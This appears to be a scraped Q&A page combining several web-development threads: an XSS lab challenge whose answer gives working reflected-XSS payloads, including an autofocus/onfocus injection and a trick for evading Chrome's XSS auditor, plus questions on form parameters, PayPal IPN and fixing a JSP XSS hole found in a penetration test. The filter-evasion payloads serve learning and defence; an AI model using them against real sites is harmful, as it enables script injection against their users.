How can I bypass the XSS filter and pop an alert on this page:
http://leettime.net/xsslab1/stage--08.php
The script seem to filter single-quote (') on the server-side making it impossible for me to inject into the value field.
<input type="text" name="name" value=''></input>
This page is part of a XSS test series, so I am sure that it is possible to pop an alert somehow but I just don't know how.
Enter a name and click submit. The form is submitted through a GET request so you can see the two parameters in the URL. Both are reflected in the HTML response.
name=spongebob&submit=
<font size=3>Enter Your Name here : <input type="text" name="name" value='spongebob'></input>
<input type="submit" name="submit" value="">
Instead of the name parameter focus on submit. It is enclosed in double quotes which aren't filtered. Because the character > is removed it is not possible to close the tag so injection must occur inside it the tag. > is stripped away:
name=spongebob&submit=%22%3E%3Cscript%3Ealert(document.URL)%3C/script%3E
<input type="submit" name="submit" value=""<scriptalert(document.URL)</script">
It's possible to run javascript automatically by combining onfocus and autofocus.
name=spongebob&submit=%22%20autofocus%20onfocus=%22alert(document.URL)
<input type="submit" name="submit" value="" autofocus onfocus="(document.URL)">
This is a working XSS that will run automatically in Firefox but not in Chrome because Chrome's XSS auditor will detect it is a reflected XSS.
Chrome XSS auditor reports that 'Token contains a reflecte XSS vector'
So let's use server side filtering of '>' to our advantage so Chrome can't detect that the submit parameter is reflected to the HTML.
name=spongebob&submit="%20auto>focus%20onf>ocus="alert(doc>ument.URL)
Chrome XSS auditor bypassed using because of server side filtering
I was mistaken. There is additional form field that can be injected to complete the task.
Related
I'm working on an application with Struts 1 and JSP. I have to write XSS protection. I have inputs like this one :
<input id="name" name="name" class="someClass" type="text"
value="<bean:write name="personForm" property="name"/>">
I read that for protection XSS attack i have to add attribute filter in bean:write and filter should be true. So my code looks like that now
<input id="name" name="name" class="someClass" type="text"
value="<bean:write name="personForm" property="name" filter="true"/>">
But still I'm able to submit scripts. Do you know why this might happen.
bean:write is only for rendering purposes.The value passed to the server side is not get filtered.
I have an url like /documents/search?q=searchterm. On that page, I have an dropdown box where another searchterm can be added. That box has an onchange event and reloads the page:
<form><select name="w" class="form-control" onchange="this.form.submit();">
When the onchange event fires, the page is reloaded and the w parameter is added to the url, but the q parameter is lost. How can I tell my form, that on reload all the existing parameters are kept?
You need to include any other parameters in the form as hidden inputs:
<form>
<select name="w" class="form-control" onchange="this.form.submit();">
<input type="hidden" name="q" value="{{ search_term }}">
</form>
You need to make sure that search_term (obtained from the GET parameters) is in the context being passed to the template.
If possible you should consider using Django's Forms API to manage the form data.
How can i create a html form that action attribute have 2 destination.I want when user click on submit bottom , check if user entered wrong data the page goes to another pages with window.location and if user insert the correct input goes to main page with the same instruction.
First of all, what do you mean by correct input?
Main form data validation occurs in server side, not client side. you'd better use client side just for simple verification, like for typos.
There is no need for 2 destination pages (as you call it so).
You may use the standard action attribute which is the page on the server to which you are sending your form data.
there, You have the option to decide which condition needs what action and send the data (and then the user) to the desired page / action.
Sample code for the form
<form id='myform' action='action.php' method='POST' target='formresponse'>
<label for='name' >Your Full Name*: </label><br/>
<input type='text' name='name' id='name' maxlength="50" /><br/>
<label for='email' >Email Address*:</label><br/>
<input type='text' name='email' id='email' maxlength="50" /><br/>
<input type='button' name='Submit' value='Submit' />
</form>
<iframe name='formresponse' width='300' height='200'></frame>
Multiple action
function SubmitForm()
{
document.forms['contactus'].action='action1.php';
document.forms['contactus'].target='frame_result1';
document.forms['contactus'].submit();
document.forms['contactus'].action='action2.php';
document.forms['contactus'].target='frame_result2';
document.forms['contactus'].submit();
return true;
}
I added a PayPal Donate button on my site, with that code
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="business" value="pro-email#gmail.com">
<input type="hidden" name="cmd" value="_donations">
<input type="hidden" name="item_name" value="Donation">
<input type="hidden" name="item_number" value="Donation">
<select name="amount"><option value="2.00">$2.00</option><option value="5.00">$5.00</option><option value="10.00">$10.00</option></select>
<input type="hidden" name="currency_code" value="EUR">
<input type="image" name="submit" border="0" src="https://www.paypal.com/en_US/i/btn/btn_donate_LG.gif" alt="PayPal - The safer, easier way to pay online">
</form>
I want add and show Donators names or emails with the $$ amount on list on my website after then when someone pays. How can i do this?
I would set something like up using PayPal Instant Payment Notification (IPN).
It will automatically POST data about transactions to a listener script you have on your server. That script can receive the data and load it into a database table called "donors" or whatever you want to call it.
Then on your site you can simply pull the data from the donors table and display it accordingly.
Since you're using WordPress I'd recommend taking a look at this PayPal IPN for WordPress plugin. It's free and it will get you up and running with IPN very quickly. It logs all of the IPN data in WordPress and allows you to easily extend the plugin using a number of hooks to trigger events based on different IPN types or payment status.
The following piece of code in my JSP caused a cross site scripting vulnerability on the input tag.
<form name="acctFrm" method="post" action="<%=contextPath%>/form/acctSummary?rpt_nm=FIMM_ACCT_SUMM_RPT">
<table>
<tr>
<td>Account Id:</td>
<td>
<input class="tbl1" type="text" id="acctId" name="acctId" size="20" maxlength="10" value="<%=rptBean.getAcctId()%>"/>
<img class="tbl1" src="<%=contextPath%>/img/Submit.gif" border="0" />
</td>
</tr>
</table>
</form>
During Penetration testing they were able to alert some random message to the user by injecting a alert script in the value attribute of the tag as follows
<input class="tbl1" type="text" id="acctId" name="acctId" size="20" maxlength="10" value="1"><script>alert(12345)</script>" />
What is the problem here, and what would be the fix.
I was reading through some online references on XSS still I wasnt 100% sure on what could be the issue.
Any help would be greatly appreciated.
Thanks,
Deena
I have used the following solution,
The scriplet in the value attribute is the problem, I replaced it with jstl tag, I read somewhere that jstl tags have inbuild escaping mechanism to avoid xss issues.
<input class="tbl1" type="text" id="acctId" name="acctId" size="20" maxlength="10" value="<c:out value=${rptBean.acctId}"/>"/>
This works good for my issue.
Thanks
It seems the penetration testers were able to manipulate their session such that rptBean.getAcctId() would return an arbitrary string. If they could inject quotes and a right bracket, they could "force close" the input tag and insert their own script tag.
It looks like penetration testers got the method to return the string 1"><script>alert(12345)</script>.
This indicates that you need to escape the data when writing to the page. I would suggest taking a look at the answer on escaping HTML in jsp.
Also, remember that code does not have to be "perfectly" formatted for a browser to render it "correctly". Here are some links on how attackers may try evade XSS filters:
http://blog.whitehatsec.com/tag/filter-evasion/
http://ha.ckers.org/xss.html
Always treat user data as "dangerous" and take care when rendering it on a page.
It seems using jstl tag <c:out value=""> in value attribute will cause errors in jstl <form options> tags,
more info
XSS prevention in JSP/Servlet web application
if getAcctId() returned data come from DB you can filter before sending to client. for example check is data should be a number.